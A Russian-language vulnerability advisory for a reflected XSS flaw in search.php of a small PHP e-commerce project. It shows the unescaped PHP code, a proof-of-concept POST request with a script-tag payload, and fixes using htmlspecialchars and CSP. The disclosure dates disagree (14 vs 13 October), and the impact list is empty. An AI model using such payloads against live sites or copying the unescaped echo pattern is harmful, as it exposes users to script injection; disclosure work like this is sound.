
Публичное раскрытие и proof-of-concept для CVE-2025-61454, отражённой XSS-уязвимости в search.php проекта E-commerce Project v1.0, включая шаги эксплуатации и рекомендации по устранению.
Дата раскрытия: 14 октября 2025 г.
Идентификатор CVE: CVE-2025-61454
Серьёзность: СРЕДНЯЯ (CVSS 6.1)
Уязвимость отражённого межсайтового скриптинга (XSS) существует в E-commerce Project v1.0, а именно в конечной точке search.php. Несанитизированный ввод в параметре search напрямую отражается обратно в HTML-ответ, что позволяет злоумышленникам выполнять произвольный JavaScript в браузере пользователя, который переходит по вредоносной ссылке или отправляет специально созданный запрос.
Этой проблеме присвоен идентификатор CVE-2025-61454. На момент раскрытия патч от поставщика не выпущен.
search.phphttp://localhost/e-commerce-main/search.phpСервер не выполняет надлежащую санитизацию параметра search из данных POST перед его отражением в HTML-ответе. Это позволяет злоумышленникам внедрять JavaScript-пейлоады, что приводит к выполнению кода на стороне клиента.
Злоумышленник формирует ввод, содержащий встроенное скриптоподобное содержимое, и отправляет его на уязвимую POST-конечную точку. Поскольку сервер отражает ввод в HTML-ответ без применения надлежащего HTML/атрибутного/JS-кодирования, браузер обрабатывает отражённое содержимое как исполняемую разметку и выполняет её. Это сценарий отражённого (непостоянного) XSS; злоумышленник должен убедить жертву выполнить запрос или перейти по специально созданной ссылке/форме.
$search = $_POST['search'];
echo "<div>Search results for: $search</div>";
| Идентификатор CWE | Название |
|---|---|
| CWE-79 | Некорректная нейтрализация ввода при генерации веб-страницы ('Межсайтовый скриптинг') |
| Оценка | Серьёзность | Векторная строка |
|---|---|---|
| 6.1 | СРЕДНЯЯ | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
Успешная эксплуатация может привести к:
git clone https://github.com/Bhabishya-123/E-commerce.git
Используйте XAMPP/LAMP для развёртывания проекта и доступа к приложению.
POST /e-commerce-main/search.php HTTP/1.1
Host: localhost
Referer: https://localhost/e-commerce-main/
Content-Type: application/x-www-form-urlencoded
search=yxo9p%3cscript%3ealert(1)%3c%2fscript%3exnzmd&submit=
search=yxo9p<script>alert(1)</script>xnzmd&submit=
yxo9p<script>alert(1)</script>xnzmd
Пояснение:
Пейлоад <script>alert(1)</script> встроен в параметр search. Когда жертва отправляет форму поиска с этим вредоносным пейлоадом (или её обманом заставляют это сделать с помощью социальной инженерии), JavaScript выполняется в контексте её браузера.
Если уязвимость присутствует, браузер выполнит JavaScript-код, отобразив окно предупреждения со значением 1. Это подтверждает успешную эксплуатацию XSS.
htmlspecialchars() или аналогичные функции для кодирования всех недоверенных выходных данных перед выводом в HTML.$search = htmlspecialchars($_POST['search'], ENT_QUOTES, 'UTF-8');
echo "<div>Search results for: $search</div>";
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
| Событие | Дата |
|---|---|
| Уязвимость обнаружена | 16 сентября 2025 г. |
| Публичное раскрытие | 13 октября 2025 г. |
| Патч доступен | ❌ Недоступен на момент раскрытия |
Эта уязвимость была обнаружена и раскрыта:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 Данный бюллетень опубликован независимо в связи с отсутствием официального патча от поставщика.